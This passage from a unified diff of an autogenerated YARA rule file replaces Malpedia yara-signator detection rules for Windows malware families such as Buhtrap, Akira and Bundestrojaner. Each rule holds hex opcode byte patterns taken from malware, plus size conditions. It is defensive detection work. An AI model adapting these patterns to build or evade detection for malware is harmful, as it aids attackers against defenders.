+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blindingcan_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "b32504dab3948f7d9f4359ced9850f6b13ecbdf66af15ac79005f7fe62b0a577"
+		logic_hash = "74166ac02345e359092c0de07b6503277e6c28815f8b4319943798385b40290d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137088,32 +137630,38 @@ rule MALPEDIA_Win_Dyepack_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4c2410 33ed 33ff 3bc3 }
-		$sequence_1 = { ff15???????? 8b8c2428100000 53 51 e8???????? 83c408 5d }
-		$sequence_2 = { 8d4c2418 53 51 8d54242c }
-		$sequence_3 = { 8d44242c 51 50 56 ff15???????? 85c0 }
-		$sequence_4 = { 53 52 8d44242c 51 50 56 ff15???????? }
-		$sequence_5 = { 6a03 53 aa 8b842434100000 53 6800000040 50 }
-		$sequence_6 = { 3bf8 7cb2 7f08 8b4c2410 3be9 72ac 56 }
-		$sequence_7 = { 8b842434100000 53 6800000040 50 ff15???????? 8bf0 }
-		$sequence_8 = { 52 56 ff15???????? 56 ff15???????? 8d442410 895c2410 }
-		$sequence_9 = { ff15???????? 56 ff15???????? 8d442410 895c2410 }
+		$sequence_0 = { c7459c52b86f28 c745a0b5c9a315 c745a453e8ba52 c745a8b67dbc8f }
+		$sequence_1 = { c745c091810345 c745c401761a06 c745c859c24b75 c745ccec723768 c745d01a51c3d9 c745d46744180d }
+		$sequence_2 = { c745f0a70d9fae c745f48f2aedf1 c745f8fee389dd e8???????? }
+		$sequence_3 = { 8bca 8db5fcfeffff 8dbdfcfdffff f3a5 68b80b0000 8bfa }
+		$sequence_4 = { c78560fdffffdd2edf9c c78564fdffffbaced582 c78568fdffff9ffa2924 c7856cfdfffff0888168 c78570fdffff48b96edc }
+		$sequence_5 = { c785d8feffffcbdb9298 c785dcfeffff85b369f5 c785e0feffffe981ae61 c785e4feffff2f30fbf4 c785e8feffff3d4fab62 c785ecfeffff9c1c9a02 }
+		$sequence_6 = { c78558fdffff850d28e7 c7855cfdffffd50f3950 c78560fdffffdd2edf9c c78564fdffffbaced582 }
+		$sequence_7 = { 8bc1 99 f7fb 888c0dfcfeffff }
+		$sequence_8 = { f7fe 8bca e8???????? 85c0 7409 e8???????? }
+		$sequence_9 = { 48895c2408 4889742410 57 4883ec20 488d057e910100 488bda 488bf9 }
+		$sequence_10 = { f644245010 0f849f000000 488b442438 488b4c2430 48ff00 ff15???????? 488d4c247c }
+		$sequence_11 = { 744b 48391d???????? 7442 ff15???????? 85c0 7438 488b0d???????? }
+		$sequence_12 = { 7403 c60701 ffc3 4983c404 4883c608 48ffc7 83fb1a }
+		$sequence_13 = { ba00020000 488bd9 c745e745f0c989 c745eb66772976 c745ef70a9e4c4 c745f3d39c157b c745f7c10df5f5 }
+		$sequence_14 = { ff15???????? 4885c0 7434 33d2 488bc8 ff15???????? 85c0 }
+		$sequence_15 = { 8d7c001e 428d0427 3d00000100 7e6c 488b15???????? b918200000 4533c9 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 363520
 }
-rule MALPEDIA_Win_Buhtrap_Auto : FILE
+rule MALPEDIA_Win_Sharpknot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "05dfe1b7-7658-5a73-95c7-d9332b18397d"
+		id = "e73f10d7-589d-5303-bfd9-088b7ddd5e13"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.buhtrap_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sharpknot_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "93883b1f6de8bbb29347fc147d93effe74e75beef64981374094d11349e65af7"
+		logic_hash = "56a2b51a444e0193080b0e96d12a6b29053b987612719c6a66e8111156406cdd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137127,37 +137675,32 @@ rule MALPEDIA_Win_Buhtrap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 59 59 84c0 0f8435010000 }
-		$sequence_1 = { 6aff 57 50 68e9fd0000 ff15???????? 8bf0 83fe01 }
-		$sequence_2 = { 8bec 83ec44 53 56 57 bf04010000 }
-		$sequence_3 = { 6a00 6a00 ab ab 8b45f8 50 }
-		$sequence_4 = { e8???????? 6a06 5a b9???????? 8945c4 e8???????? }
-		$sequence_5 = { e8???????? 803d????????00 7426 8b0d???????? 85c9 7406 }
-		$sequence_6 = { 746f 3b45f8 776a 6805010000 ff15???????? }
-		$sequence_7 = { 56 ff15???????? 83c414 84db 7541 }
-		$sequence_8 = { 85c0 742f 6a01 53 6a0c }
-		$sequence_9 = { 7429 8b7b20 6a00 8d7308 e8???????? 59 }
-		$sequence_10 = { e8???????? 8b5dec 83c410 eb57 8d45f0 }
-		$sequence_11 = { 83e800 57 745b 48 7567 }
-		$sequence_12 = { ff75f8 ffd7 85c0 754c 8b45fc }
-		$sequence_13 = { 83c40c 85c0 7452 b8ff000000 e8???????? 880437 }
-		$sequence_14 = { 59 84c0 0f84a3000000 6a10 }
+		$sequence_0 = { 85c0 0f84b6000000 8d942454020000 8d4608 52 }
+		$sequence_1 = { 747a 8b842460040000 8d54243c 52 }
+		$sequence_2 = { c60300 f2ae f7d1 2bf9 8d542410 8bc1 8bf7 }
+		$sequence_3 = { 7419 83e818 83ea18 b906000000 8bf0 8bfa }
+		$sequence_4 = { 8bc8 8d942c2c020000 83e103 f3a4 8d8c2428010000 51 }
+		$sequence_5 = { 2bcd f7e9 c1fa02 8bc2 c1e81f 03d0 83fa01 }
+		$sequence_6 = { b801000000 5b 83c41c c3 ffd3 57 ffd3 }
+		$sequence_7 = { 8d442404 56 68???????? 50 e8???????? 8b15???????? 8d4c2410 }
+		$sequence_8 = { f3a4 b910000000 8d7c2414 f3ab 8d442454 8d4c2410 50 }
+		$sequence_9 = { c1f805 59 8a4dff 8d3c8540e64400 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 1032192
 }
-rule MALPEDIA_Win_Findpos_Auto : FILE
+rule MALPEDIA_Win_Afrodita_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0a568c8d-936e-5180-b48c-3459a7de3f2c"
+		id = "abc25194-e40d-5d3d-8aa7-1b131b3ce317"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.findpos_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.afrodita_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "16968f111dc679e93555d1d3b7ae27dea3f4769dc763c7bf583a162ef6a1f34f"
+		logic_hash = "5cdb28e0e0c0d2fc18f90f498d1e0e06f36fb26b48f78ae36bd548bd118d94b5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137171,32 +137714,32 @@ rule MALPEDIA_Win_Findpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 59 8b45f4 03c3 8945f4 }
-		$sequence_1 = { 59 8b45f4 03c3 8945f4 2bfb }
-		$sequence_2 = { 8b4514 40 c745ec325a4000 894df8 8945fc 64a100000000 }
-		$sequence_3 = { 53 8b5d10 56 57 8b3d???????? 6a3c }
-		$sequence_4 = { 8d7608 660fd60f 8d7f08 8b048d28544000 ffe0 }
-		$sequence_5 = { 51 8b8de8fbffff 8d95ecfbffff e8???????? 83c40c 85c0 743c }
-		$sequence_6 = { 50 50 8d85f8feffff 50 68???????? }
-		$sequence_7 = { 8ac6 243f 884dfa 8845fb }
-		$sequence_8 = { 6803000010 56 ff15???????? 83f8ff 0f8481000000 8b45f8 }
-		$sequence_9 = { 85c0 7429 8bbdf4efffff 33f6 c1ef02 85ff 741a }
+		$sequence_0 = { 8d8d6cffffff 895dec e8???????? 8b5de8 8bc7 83c80c c745fc03000000 }
+		$sequence_1 = { e8???????? 85c0 8d4dd0 0f94c3 e8???????? 8ac3 }
+		$sequence_2 = { 8bc6 83e0c0 8945f0 8d4110 8945e4 8bc2 2bc1 }
+		$sequence_3 = { c3 6a00 8bce e8???????? 8b7d0c }
+		$sequence_4 = { c745fc05000000 0d3c001800 8945ec 8d4584 50 }
+		$sequence_5 = { c745fc04000000 395d10 0f8600010000 6690 6a02 8d8d70ffffff e8???????? }
+		$sequence_6 = { 8bc3 eb08 8d040a 3bc3 0f42c3 3dffffff3f 0f87c8000000 }
+		$sequence_7 = { ff5018 8b7d08 0f1f00 83f8ff 7504 b301 eb56 }
+		$sequence_8 = { ff7514 890b 8d4e10 ff7510 897b04 8b01 53 }
+		$sequence_9 = { c645fc0d 33c0 56 8b11 8bca f3ab 85d2 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 2334720
 }
-rule MALPEDIA_Win_Strifewater_Rat_Auto : FILE
+rule MALPEDIA_Win_Crypto_Fortress_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "93638997-4b39-56df-8c2c-e15416c268e2"
+		id = "b81b861a-e59d-5e35-89f8-b48e5d1e64a8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strifewater_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.strifewater_rat_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crypto_fortress_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "c4c860d44d36734eadf7062d94acf85100c901ee56a2bc935f573163c784a260"
+		logic_hash = "7ca8cfbcda8442ad971ad2acb852f7382cff13447a653716ebcb2d4ba6db0aed"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137210,32 +137753,32 @@ rule MALPEDIA_Win_Strifewater_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 4154 4155 4156 4157 488dac24e0d4ffff b8202c0000 }
-		$sequence_1 = { 48894108 48894110 488d05574d0400 488901 488bc1 c3 33c0 }
-		$sequence_2 = { 488d0d3c8f0600 e8???????? 48894610 e8???????? 488bf8 4885c0 7414 }
-		$sequence_3 = { 7510 e8???????? c70016000000 e8???????? 488d4318 498906 488b5c2450 }
-		$sequence_4 = { 48894c2428 4889442420 4c8d8dc8010000 448bc6 488d154fff0800 488d8d900f0000 e8???????? }
-		$sequence_5 = { 488bf0 4863cb c6040100 33c9 85db 7e3f 488bd0 }
-		$sequence_6 = { 0338 85ff 0f8ee0010000 4863f7 488bce e8???????? 4c8bf0 }
-		$sequence_7 = { 488d05d8e3feff 4889442430 488d4c2420 e8???????? 4c396b08 74f0 488b5b08 }
-		$sequence_8 = { 4053 4883ec20 488bd9 488bc2 488d0d0d890200 48890b 488d5308 }
-		$sequence_9 = { 90 be01000000 89b424b0000000 83630800 488d0d10400500 48890b }
+		$sequence_0 = { 341b aa 2c03 aa 2cf9 aa 2c00 }
+		$sequence_1 = { 0433 aa 04fc aa 3411 }
+		$sequence_2 = { e8???????? 8bd8 68???????? e8???????? 50 53 }
+		$sequence_3 = { 8d3dccec4000 33c0 0450 aa }
+		$sequence_4 = { 33c0 0442 aa 2ce1 }
+		$sequence_5 = { 83c308 8345fc08 c78548ffffff9c000000 8d8548ffffff 50 e8???????? }
+		$sequence_6 = { 8345fc04 e8???????? 8803 83c301 8345fc01 8b45fc 5b }
+		$sequence_7 = { a3???????? 68???????? ff35???????? e8???????? 85c0 0f84a9030000 }
+		$sequence_8 = { 3dffff0000 0f84040e0000 a3???????? e8???????? }
+		$sequence_9 = { 68???????? ff35???????? e8???????? 85c0 0f842b010000 a3???????? }
 
 	condition:
-		7 of them and filesize < 1552384
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Asprox_Auto : FILE
+rule MALPEDIA_Win_Arefty_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0520b3a3-9483-5d2a-9f24-050358cf9005"
+		id = "a1bbf58c-af9c-5d64-b893-96f60da58ce9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.asprox_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.arefty_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "45002ecaaab3dadffe3aed1cfa4261799259027c0d201b2024f1681cd43bb771"
+		logic_hash = "fde5f4282a78a6517cf5f33df8600bda217d95924465f99b86aed788930f75c3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137249,32 +137792,32 @@ rule MALPEDIA_Win_Asprox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 898558ffffff 6a00 6a00 8b4580 50 ff15???????? }
-		$sequence_1 = { 8b4df8 898b54fa0000 8b4de4 898b58fa0000 8b4dac 898b5cfa0000 }
-		$sequence_2 = { 8b4d08 51 6801000080 ff15???????? 85c0 0f85a7010000 c745e003000000 }
-		$sequence_3 = { c6458a00 8d4584 50 8b8d08ffffff 51 ff9538ffffff }
-		$sequence_4 = { ff15???????? 898558ffffff c78560ffffff00000000 8b4d0c 898d3cffffff 6a40 6a00 }
-		$sequence_5 = { eb6a c743041c000000 eb37 8b03 83780400 0f840f0f0000 8b10 }
-		$sequence_6 = { 8bec 51 a1???????? 83c001 33d2 b900010000 f7f1 }
-		$sequence_7 = { 51 ff9538ffffff 8945bc c645c445 c645c578 c645c669 c645c774 }
-		$sequence_8 = { 52 8b4508 50 6a02 ff55f0 85c0 7535 }
-		$sequence_9 = { 52 8b85e8fbffff 50 e8???????? 83c40c 6a00 6a00 }
+		$sequence_0 = { 53 ff15???????? 680000a000 e8???????? }
+		$sequence_1 = { 50 53 ff15???????? 680000a000 e8???????? }
+		$sequence_2 = { 50 680000a000 57 53 ff15???????? 85c0 }
+		$sequence_3 = { 8b07 68???????? 6a03 8d04b0 50 }
+		$sequence_4 = { 50 8b07 68???????? 6a03 8d04b0 50 }
+		$sequence_5 = { 50 53 ff15???????? 680000a000 }
+		$sequence_6 = { 57 e8???????? 83c404 83fbff 7407 53 }
+		$sequence_7 = { 0fb6041e 50 8b07 68???????? 6a03 }
+		$sequence_8 = { ff15???????? 680000a000 e8???????? 8bf8 }
+		$sequence_9 = { 680000a000 57 53 ff15???????? }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Spyder_Patchwork_Auto : FILE
+rule MALPEDIA_Win_Tmanger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "79eb8f27-1301-5204-b70a-f074d773e2a2"
+		id = "90de765e-dcad-555e-a3e2-21f3e814ffeb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder_patchwork"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spyder_patchwork_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tmanger_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "88e656ab24018abde08f518b393d747f56ac10af0939df2743e80e35c10ea588"
+		logic_hash = "a7986e1f1ff68dbdf6cb715e7bd380c31c6c5e7bcad1efb5e3857ab5edff19ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137288,32 +137831,32 @@ rule MALPEDIA_Win_Spyder_Patchwork_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bc2 50 52 51 68???????? 6a02 e8???????? }
-		$sequence_1 = { 7e23 8b37 8bce 8b542420 c1e10a 03d1 8b8a00040000 }
-		$sequence_2 = { 7409 b9f7ff0000 66214f0c 6800010000 57 56 e8???????? }
-		$sequence_3 = { c3 33c0 84db 56 0f95c0 03c7 50 }
-		$sequence_4 = { 89040e b001 5e 5b c3 8bff 53 }
-		$sequence_5 = { 8ae3 8d142e c0e404 b90f000000 83ee10 8ac4 8d52ff }
-		$sequence_6 = { 8d0c50 d1fa 0fb601 8d3483 668b8648080000 668901 0393540c0000 }
-		$sequence_7 = { ff742430 e8???????? 83c410 8bc8 85d2 0f8c8f000000 7f08 }
-		$sequence_8 = { 7410 663bc7 740b 83f801 7406 8bee 8b36 }
-		$sequence_9 = { 0f84c4000000 66837c240c01 0f85b8000000 57 8b7c2408 83c708 f644241401 }
+		$sequence_0 = { c74118d95dc845 c7411cf8f0564e c7412066b8276e c7412425d933d1 c7412861fdc72a c7412cdf9134d2 }
+		$sequence_1 = { c741651f013f62 c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb }
+		$sequence_2 = { c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 c7417958fffa19 }
+		$sequence_3 = { c7410491b20524 c74108cc6188ff c7410c16d9fdf8 c741103a71c135 }
+		$sequence_4 = { c7411cf8f0564e c7412066b8276e c7412425d933d1 c7412861fdc72a c7412cdf9134d2 c74130324d251d c74134375ec19d }
+		$sequence_5 = { c741651f013f62 c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 c7417958fffa19 }
+		$sequence_6 = { c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 }
+		$sequence_7 = { c74114c2a02ab0 c74118d95dc845 c7411cf8f0564e c7412066b8276e }
+		$sequence_8 = { c741103a71c135 c74114c2a02ab0 c74118d95dc845 c7411cf8f0564e c7412066b8276e c7412425d933d1 c7412861fdc72a }
+		$sequence_9 = { c7412066b8276e c7412425d933d1 c7412861fdc72a c7412cdf9134d2 }
 
 	condition:
-		7 of them and filesize < 2260992
+		7 of them and filesize < 8252416
 }
-rule MALPEDIA_Win_Powerpool_Auto : FILE
+rule MALPEDIA_Win_Lowball_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4c6bacc6-3c31-5308-8644-c77bb5f04b3b"
+		id = "94fba641-8dbf-5316-b4e6-0a547aece5a2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.powerpool_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lowball_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "fc225d3ab668ac0553c91764abb5591ff765822f57f79bb166f528bf2dc805b8"
+		logic_hash = "75931b935ec88e9d9d484d9216c8a6d089fe4ea50136062678650dec871b0d9d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137327,38 +137870,32 @@ rule MALPEDIA_Win_Powerpool_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 743f 85db 743b 8b4304 48 83f814 7732 }
-		$sequence_1 = { 0101 8b45ec 8b4d18 5f }
-		$sequence_2 = { 740f 68b80b0000 ffd7 381d???????? 75f1 8b0d???????? }
-		$sequence_3 = { 006711 40 0000 0303 }
-		$sequence_4 = { 740f 6a02 68???????? 8d4e14 e8???????? 8b4604 }
-		$sequence_5 = { 740f 8b4d0c 51 8b4d08 }
-		$sequence_6 = { 8975ec 8955fc a840 7415 8b4508 8b4df8 8b5df4 }
-		$sequence_7 = { 013e 017e08 894630 5b }
-		$sequence_8 = { 8b6c240c 8b4d00 56 8bf0 8bc1 }
-		$sequence_9 = { 740f 8bc3 83fe10 7303 }
-		$sequence_10 = { 7410 50 6a00 ff15???????? 50 ff15???????? 8b5510 }
-		$sequence_11 = { 014140 8b45cc 8bc8 d3ea 8b4df8 }
-		$sequence_12 = { 740f 837dd001 7509 50 }
-		$sequence_13 = { 740f 8bcb e8???????? c645ff01 }
-		$sequence_14 = { 01411c 8b7df0 85c0 742c }
-		$sequence_15 = { 005311 40 005d11 40 006711 }
+		$sequence_0 = { 8bcb 8d94243c090000 83e103 f3a4 83c9ff 8dbc2424030000 }
+		$sequence_1 = { f3a5 8d842428020000 8bcb 50 83e103 }
+		$sequence_2 = { 881c10 40 3bc6 7cf3 5b 5f }
+		$sequence_3 = { 8bd8 3bdd 895c2418 0f84db000000 8b94242c020000 55 }
+		$sequence_4 = { 55 50 ff15???????? 8bf0 3bf5 8974241c }
+		$sequence_5 = { 4f c1e902 f3a5 8bcb 8d942430060000 83e103 f3a4 }
+		$sequence_6 = { 8b3d???????? 68???????? 53 ffd7 8bf0 83c408 85f6 }
+		$sequence_7 = { c1e902 f3a5 8bcb 8d84243c090000 }
+		$sequence_8 = { 33c0 8d7c241d 8d54241c f3ab }
+		$sequence_9 = { 6a00 6a00 6a00 8d442428 6a00 50 ff15???????? }
 
 	condition:
-		7 of them and filesize < 819200
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Bootwreck_Auto : FILE
+rule MALPEDIA_Win_Murofet_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e46a87d8-ca64-51d8-8465-fa91fe773b67"
+		id = "2ee51841-1931-5e92-8698-30f3c51730b7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bootwreck_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.murofet_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "7dd89e2ad6a7e4ec6bd403b4a60d8d35c2c5a80bbaddf577283e953056078258"
+		logic_hash = "9298e47cf759c52371e794c7e892c3c0542296ba15da499ce2f22bd9f2d8e48e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137372,32 +137909,32 @@ rule MALPEDIA_Win_Bootwreck_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 d558 6e 82c178 0e 2a5cce35 45 }
-		$sequence_1 = { e9???????? ff3424 6802f2412c 9c 876c2444 9c 681ef2f505 }
-		$sequence_2 = { 6a02 e8???????? 33db 3bc3 7412 ffd0 0fb7c0 }
-		$sequence_3 = { 660fb3c7 89c7 f9 f8 f5 84f0 83c404 }
-		$sequence_4 = { bed27fe028 a4 ab 5b 6212 672c13 1abaeb624f13 }
-		$sequence_5 = { 90 e8???????? 89442408 9c 660fb6c2 660fbec2 0f9ac4 }
-		$sequence_6 = { 85c0 881424 9c 60 66c70424320b 8d64242c 0f84e23a0300 }
-		$sequence_7 = { 25ffffff7f 66c1eb0d 6687f3 80f72b 60 0345fc 8d642444 }
-		$sequence_8 = { c6442414c9 c6442408a4 ff742430 c23400 ff3424 895e24 9c }
-		$sequence_9 = { 70af 9c 236202 3376ad 9add1461e82b4a 97 1e }
+		$sequence_0 = { e8???????? a2???????? 84c0 7510 e8???????? 3c04 }
+		$sequence_1 = { e8???????? a2???????? 84c0 7510 e8???????? 3c04 73ce }
+		$sequence_2 = { 7510 e8???????? 3c04 73ce b002 }
+		$sequence_3 = { 56 ff15???????? c6443eff00 83f8ff 7509 56 ff15???????? }
+		$sequence_4 = { 72e5 e8???????? a2???????? 84c0 }
+		$sequence_5 = { 8816 e8???????? 0fb6c0 99 }
+		$sequence_6 = { 6a10 8d4624 55 50 ff15???????? }
+		$sequence_7 = { a2???????? 84c0 7510 e8???????? 3c04 73ce b002 }
+		$sequence_8 = { a2???????? 84c0 7510 e8???????? 3c04 73ce }
+		$sequence_9 = { 8d4624 55 50 ff15???????? }
 
 	condition:
-		7 of them and filesize < 10821632
+		7 of them and filesize < 622592
 }
-rule MALPEDIA_Win_Akira_Auto : FILE
+rule MALPEDIA_Win_Bundestrojaner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "15bec9b6-593f-5024-bdc9-f9c22915c4b9"
+		id = "22b55f6b-e040-5c18-ad23-824cbb63f192"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.akira"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.akira_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bundestrojaner_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "df165485c04575afe03a18bf0b6e5a6197bfd9f8e4bf586c974ab0f67dd9d7c7"
+		logic_hash = "4726f6c288ba39b565a7c1ba35f099303564bb770df1743f44ad4cd587b35c16"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137411,32 +137948,32 @@ rule MALPEDIA_Win_Akira_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 488d8a58000000 e9???????? 4889542410 55 4883ec40 488bea }
-		$sequence_1 = { c1fa06 8bc2 c1e81f 03d0 6bc27f 2bc8 42888c05cb020000 }
-		$sequence_2 = { 488d4b28 e8???????? 66837b0a00 7413 bab0000000 488bcb e8???????? }
-		$sequence_3 = { f30f7f442430 33d2 488d4c2430 e8???????? 498b4f18 48394d28 0f854f010000 }
-		$sequence_4 = { e8???????? 48895f08 ba18000000 488bcf e8???????? 488d4dd8 ff15???????? }
-		$sequence_5 = { ff5020 88442430 0f57c0 0f11459f 48c745af01000000 41bf0f000000 4c897db7 }
-		$sequence_6 = { 4584ed 7444 498d5eff 488b75df 483bde 7425 e8???????? }
-		$sequence_7 = { 66660f1f840000000000 49ffc0 6642833c4000 75f5 488d9539030000 488d8de0150000 e8???????? }
-		$sequence_8 = { 41884640 41c6464101 498b0c24 48894c2430 4885c9 7445 488b5770 }
-		$sequence_9 = { 7508 c60330 48ffcb ebdf fec1 880b 483bde }
+		$sequence_0 = { e8???????? 8bf0 85f6 75d3 57 ff15???????? }
+		$sequence_1 = { 84c9 0f8486010000 84c0 0f84e6000000 8b4e24 8b11 ff5204 }
+		$sequence_2 = { 7d02 8bc2 8b542414 03ca 8b5620 3bca 7e0e }
+		$sequence_3 = { 8d149d00000000 2bc3 7914 8bc1 2bc2 8b5cbc44 8b0428 }
+		$sequence_4 = { 0210 3f 2102 1008 2102 105121 0210 }
+		$sequence_5 = { 8b5614 895118 8b06 ff10 83c404 8b442414 33db }
+		$sequence_6 = { 03c8 8b4614 3bc5 894c242c 0f8e21020000 8b442420 8b4e3c }
+		$sequence_7 = { d9442454 d81d???????? d9442454 dfe0 f6c441 7406 dc0d???????? }
+		$sequence_8 = { 8b4c2418 52 8b542424 53 52 8b542420 50 }
+		$sequence_9 = { 8b56f8 33c3 8b1c8d187b0410 33c3 33c9 33c2 33d2 }
 
 	condition:
-		7 of them and filesize < 1286144
+		7 of them and filesize < 729088
 }
-rule MALPEDIA_Win_Tinyfluff_Auto : FILE
+rule MALPEDIA_Win_Evilgrab_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7516ef27-cc3c-50fb-887e-45b6927b546c"
+		id = "2f5e9905-bb83-55a1-ac75-ab30097513bc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyfluff"
